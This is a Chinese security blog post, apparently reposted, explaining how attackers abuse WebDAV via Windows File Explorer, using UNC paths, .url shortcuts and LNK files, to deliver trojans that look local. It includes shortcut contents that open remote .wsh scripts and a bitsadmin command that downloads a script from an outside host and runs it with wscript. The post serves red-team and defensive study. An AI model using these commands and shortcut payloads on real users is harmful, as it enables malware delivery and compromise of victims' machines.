文章总结： 本文阐述了利用WebDAV协议结合Windows文件资源管理器隐蔽传输木马的原理。攻击者利用UNC路径、URL及LNK文件三种载体，诱骗受害者访问看似本地的远程恶意文件以规避警告。文中分析了路径构造与DNS查询触发机制，为红队初始访问提供思路，并建议加强异常网络行为监测。 综合评分： 85 文章分类： 红队,渗透测试,恶意软件

利用Windows文件资源管理器隐蔽传输木马后门

二进制空间安全

2026年3月5日 15:32 北京

将二进制空间安全设为”星标⭐️”

第一时间收到文章更新

技术背景

#

WebDAV是一种基于HTTP的文件管理协议，在云文件存储服务普及之前，它曾因其便捷的文件传输功能而广受欢迎, 实际上，WebDAV 的设计用途是作为文件服务器，类似于 FTP 或各种云文件存储解决方案的使用方式。虽然可以通过Windows文件资源管理器访问WebDAV服务器，但大多数用户很少使用,而攻击者可以利用这一点诱骗用户下载或运行恶意软件。

#

WebDAV特性

#

假设有一台WebDAV 服务器，其根目录下有一个名为“My_Files”的文件夹。一个 WebDAV URL链接示例为:

#

https[://]exampledomain[.]com/My_Files/

假设WebDAV服务器上的根目录名为:“DavWWWRoot”,那么通过UNC路径访问同一个WebDAV服务器的路径为:

 \\exampledomain[.]com\DavWWWRoot\My_Files

默认情况下，通过UNC路径访问的WebDAV服务器将使用80端口的HTTP协议。可以在域名后指定端口号，并使用“@SSL”关键字来指定使用 HTTPS 协议。下面有两种方式使用HTTPS协议访问WebDAV服务器,第一种:

#

\\exampledomain[.]com@443\DavWWWRoot\My_Files

第二种:

\\exampledomain[.]com@SSL\DavWWWRoot\My_Files

利用文件资源管理器使用WebDAV

当通过文件资源管理器访问WebDAV服务器时，服务器的文件内容会以类似于本地系统文件夹的方式呈现。这一点尤其值得注意，因为用户正在访问网络资源的唯一明确指示是地址栏中显示的服务器IP地址或域名。下图展示了连接到WebDAV服务器时文件资源管理器的界面:

在文件资源管理器中, 可以通过多种方式调用WebDAV连接。

第一种: 直接链接

使用Windows文件资源管理器时，用户可以通过地址栏指定文件或文件夹的确切路径。此外，用户还可以通过指定远程服务器的IP地址或域名来连接到网络资源。此外，URL中的“file[://]”部分用于指定该链接是通过系统的文件浏览器打开文件或文件夹。这对于直接通过文件路径引用特定文件或文件夹尤其有用。不过，它也可以用于创建打开远程服务器上的文件或文件夹的链接。以下是一个用于打开托管在 WebDAV 服务器上的文件夹的 URL 示例：

file[://]everything-teach-pearl-eat[.]trycloudflare[.]com/DE

第二种:URL快捷方式

URL 快捷方式文件（.url）是指向指定URL的Windows快捷方式。虽然主要用于访问网站，但URL字段也可以设置为使用 file:// URI 方案在文件资源管理器中打开指定的文件路径，从而打开本地文件。同样，它也可以用于访问远程文件服务器。以下是一个通过文件资源管理器连接到WebDAV服务器的URL快捷方式文件示例:

[InternetShortcut]URL=file[://]frontier-shops-timothy-cal[.]trycloudflare[.]com/DEIDList=HotKey=0[{000214A0-0000-0000-C000-000000000046}]Prop3=19,9

此外，URL 快捷方式文件还可以用于打开 WebDAV 服务器上的文件。这对于在用户不知情的情况下运行脚本尤其有用:

[InternetShortcut]URL=file[://]module-brush-sort-factory[.]trycloudflare[.]com@SSL/DavWWWRoot/po[.]wshIDList=HotKey=0[{000214A0-0000-0000-C000-000000000046}]Prop3=19,9

URL 快捷方式文件的一个有意思的特性是，当URL使用 Windows UNC路径写入文件系统时，它们会持续触发DNS 查询。这种行为会在Windows资源管理器浏览URL快捷方式文件所在的目录时触发。当用户浏览包含带有UNC路径的URL快捷方式文件的目录时，该文件会自动尝试ping连接攻击者的基础设施，从而可能向攻击者发出警报，表明其有效载荷已在受害者身上激活。

下图展示了一个URL快捷方式文件，其UNC路径为:

\\harbor-microwave-called-teams[.]trycloudflare[.]com\\new

当在 Windows 资源管理器中打开包含该文件的目录时，会发送 DNS 查询以将域名解析为: 104.16.231.132。随后，会向该IP地址发送一个TCP SYN数据包，无意中通知攻击者正在尝试建立连接。

第三种:LNK文件

LNK 文件（.lnk）也是Windows快捷方式，但通常用作指向文件、文件夹或程序的指针。LNK文件的一个显著特点是它们还可以包含由指定程序运行的命令。这些快捷方式主要用于指向本地文件，但也可用于访问远程资源，例如WebDAV服务器。与URL快捷方式文件类似，LNK文件可以在文件资源管理器中打开WebDAV链接，或者直接打开/运行托管在WebDAV服务器上的文件（例如恶意脚本）。以下示例展示了LNK文件运行的命令，该命令打开一个指向 WebDAV 网站的链接。

C:\Windows\System32\wscript.exe "\\earl-dont-princess-bit.trycloudflare.com@SSL\DavWWWRoot\dat.wsh"

LNK 文件旨在包含命令，因此特别适用于在命令提示符或PowerShell 中直接调用脚本。以下示例展示了一个通过LNK文件连接到WebDAV 服务器并下载恶意 WSH 文件执行的命令。该命令通过命令行调用文件传输来下载 rec.wsh 文件。文件下载到临时目录后，将通过 Wscript 执行该文件。

C:\Windows\System32\cmd.exe /c bitsadmin /transfer job hxxps[://]frontier-shops-timothy-cal[.]trycloudflare[.]com/rec.wsh %TEMP%\rec.wsh &wscript%TEMP%\rec.wsh

攻击者可以利用WebDAV通过文件资源管理器传播任意文件。他们可以通过上述任何方式诱使目标受害者在文件资源管理器中打开WebDAV链接，从而向不知情的受害者展示看似安全的文件，因为该文件看起来像是存储在本地。虽然许多人都了解打开未知文件下载的风险，但与在Web浏览器中打开文件下载链接相比，通过文件资源管理器打开WebDAV链接下载文件更难察觉。Windows 默认配置为在通过远程网络打开文件时弹出消息，但此消息很容易被忽略，并且只有在通过文件资源管理器而不是脚本有效Payload打开文件时才会触发。

(全文完)

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：二进制空间安全 《利用Windows文件资源管理器隐蔽传输木马后门》